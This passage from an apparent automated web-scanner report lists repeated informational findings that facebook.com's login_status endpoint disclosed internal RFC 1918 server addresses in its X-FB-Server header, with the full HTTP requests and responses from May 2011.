GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d194038c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33b0ff708%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b0736538%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff3b4551%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b0736538&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df228c49d6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b0736538&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df181dcb1a4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff109819bec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b0736538&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f228c49d6c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff109819bec&relation=parent&transport=postmessage&frame=f1b0736538
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.150.53
X-Cnection: close
Date: Thu, 05 May 2011 01:57:13 GMT
Content-Length: 0

20.125. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.74.69

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3568e8834%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b0889c7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df129c2c24%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df38dab8b34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df129c2c24&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df41dfef9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df129c2c24&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc4630b0c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff288a8af98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df129c2c24&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f41dfef9c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff288a8af98&relation=parent&transport=postmessage&frame=f129c2c24
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.74.69
X-Cnection: close
Date: Thu, 05 May 2011 01:00:03 GMT
Content-Length: 0

20.126. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.119.105

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df379c3f47c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df328874168%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df289576d0c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37ca3aa68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df289576d0c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18beb5df%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df289576d0c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d9b12d94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3632fa79c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df289576d0c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f18beb5df&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3632fa79c&relation=parent&transport=postmessage&frame=f289576d0c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.119.105
X-Cnection: close
Date: Thu, 05 May 2011 02:01:25 GMT
Content-Length: 0

20.127. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.212.48

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df122d98cc8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df213bfbdf%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25eafb0fc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d5e0cd54%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25eafb0fc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10f19205%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25eafb0fc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24a53a79%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff239a70d58%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25eafb0fc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f10f19205&origin=http%3A%2F%2Faol.sportingnews.com%2Ff239a70d58&relation=parent&transport=postmessage&frame=f25eafb0fc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.212.48
X-Cnection: close
Date: Thu, 05 May 2011 01:34:59 GMT
Content-Length: 0

20.128. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.149.120

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df351b92654%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35817e98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23b33c9d4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ad19734%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23b33c9d4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c10c79a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23b33c9d4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27060182c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff27b5ca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df23b33c9d4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3c10c79a8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff27b5ca4c&relation=parent&transport=postmessage&frame=f23b33c9d4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.149.120
X-Cnection: close
Date: Thu, 05 May 2011 01:07:06 GMT
Content-Length: 0

20.129. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.98.37

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a532ee94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23c7b4618%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb0a50a%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffafd36bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb0a50a&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cf608678%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb0a50a&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9bf6921c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fb0a50a&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1cf608678&origin=http%3A%2F%2Faol.sportingnews.com%2Ffeb4109d&relation=parent&transport=postmessage&frame=f1fb0a50a
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.98.37
X-Cnection: close
Date: Thu, 05 May 2011 00:57:41 GMT
Content-Length: 0

20.130. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.154.49

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15b6177e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f24d857c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19584ca38%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df178b6bc34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19584ca38&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa697f414%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19584ca38&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6735cacc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff196f61654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19584ca38&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fa697f414&origin=http%3A%2F%2Faol.sportingnews.com%2Ff196f61654&relation=parent&transport=postmessage&frame=f19584ca38
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.49
X-Cnection: close
Date: Thu, 05 May 2011 02:13:41 GMT
Content-Length: 0

20.131. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.189.38

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1449ba928%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2854a4658%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cd400d2%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33bf92f6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cd400d2&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ce9ef94%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cd400d2&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e3a27ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3a231358%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1cd400d2&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1ce9ef94&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3a231358&relation=parent&transport=postmessage&frame=f1cd400d2
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.189.38
X-Cnection: close
Date: Thu, 05 May 2011 01:58:36 GMT
Content-Length: 0

20.132. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.207.23

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36734dc74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df271ab54d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2397ff58%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5886a7f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2397ff58&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cf676a08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2397ff58&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df81f0229c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1ce147b9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2397ff58&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3cf676a08&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1ce147b9c&relation=parent&transport=postmessage&frame=f2397ff58
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.207.23
X-Cnection: close
Date: Thu, 05 May 2011 01:47:22 GMT
Content-Length: 0

20.133. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.53.27

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d83ad36%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7e5136a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df77cf04%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b43c5954%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df77cf04&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfacdd34b%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff79b6de9c%26relation%3Dpare